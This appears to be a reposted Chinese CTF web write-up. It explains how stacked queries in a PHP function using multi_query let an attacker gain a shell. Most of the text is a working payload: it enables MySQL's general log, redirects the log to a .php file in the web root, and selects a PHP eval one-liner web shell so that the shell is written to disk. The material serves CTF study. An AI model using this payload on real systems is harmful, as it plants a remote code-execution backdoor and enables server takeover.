CTF web总结--利用mysql日志getshell

xiaoxiao2021-02-27  152

在common.php中发现执行sql语句用的多语句执行,所以可以利用多语句执行来getshell. 代码:

function my_mysql_query($sql){ global $conn; if($conn->multi_query($sql)){ // do { if ($result = $conn ->store_result()) { //获取第一个结果集 $row = $result->fetch_assoc(); $result->close(); //关闭一个打开的结果集 $conn->close(); //关闭连接 return $row; } } }

payload:

set global general_log='ON';set global general_log_file='/var/www/html/web00/phpinfo.php';select '<?php @eval($_POST[1]);?>';#

查询操作会写入日志文件,即一句话木马会写进日志文件。

转载请注明原文地址: https://www.6miu.com/read-14747.html

最新回复(0)